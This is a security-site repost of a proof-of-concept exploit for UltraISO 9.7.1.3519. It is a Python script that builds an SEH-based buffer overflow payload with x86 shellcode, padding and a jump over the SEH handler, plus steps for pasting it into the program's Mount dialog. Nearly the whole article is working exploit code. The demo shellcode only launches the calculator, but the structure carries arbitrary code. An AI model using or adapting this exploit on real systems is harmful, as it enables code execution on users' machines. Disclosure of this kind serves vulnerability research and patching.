首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 UltraISO 9.7.1.3519 - Buffer Overflow (SEH) 来源：@Pwsecspirit 作者：Singh 发布时间：2018-08-29   # Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH) # Date: 2018-08-23 # Author: Shubham Singh # Known As: Spirited Wolf [Twitter: @Pwsecspirit] # Vendor Homepage:   https://www.ultraiso.com # Software Link Download : https://www.ultraiso.com/download.html # Tested on: Windows 7 Ultimate - 64-bit # Steps to Reproduce: # 1. Run the python exploit script, it will create a new # 2. File with the name "exploit.txt" just copy the text inside "exploit.txt" # 3. start the UltraISO program. # 4. In the new window click "Tools" > "Mount To Virtual Drive" . # 5. Now Paste the content of "exploit.txt" into the field: " Image File ". # 6. Click "Mount" and you will see a lot of calculators. # Thanks: corelanc0d3r and PeaceMaker   #!/usr/bin/env python   #Badchars \x00\x0a\x0d shellcode  = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01" shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75" shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73" shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61" shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53" shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7" #Exit intermodular call shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3" fill = "\x42" * (126 - len(shellcode)) junk = "A" * (1064 - len(shellcode) - len(fill)) #0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe) sjmp = "\xeb\x80\xCC\xCC" seh = "\xe9\x40\x55"     spirit = junk + shellcode + fill + sjmp + seh try:     f=open("exploit.txt","w")     print "[+] Creating %s bytes evil payload.." %len(spirit)     f.write(spirit)     f.close()     print "[+] File created!" except:     print "File cannot be created"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Textpad 8.1.2 Denial Of Servic ·Microsoft Windows - JScript Re ·Instagram App 41.1788.50991.0 ·NASA openVSP 3.16.1 - Denial o ·Cisco Network Assistant 6.3.3 ·Immunity Debugger 1.85 - Denia ·HP Jetdirect - Path Traversal ·Eaton Xpert Meter 13.4.0.10 - ·LiteCart 2.1.2 - Arbitrary Fil ·R 3.4.4 Bufer Overflow ·Node.JS - 'node-serialize' Rem ·SIPP 3.3 Stack-Based Overflow   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved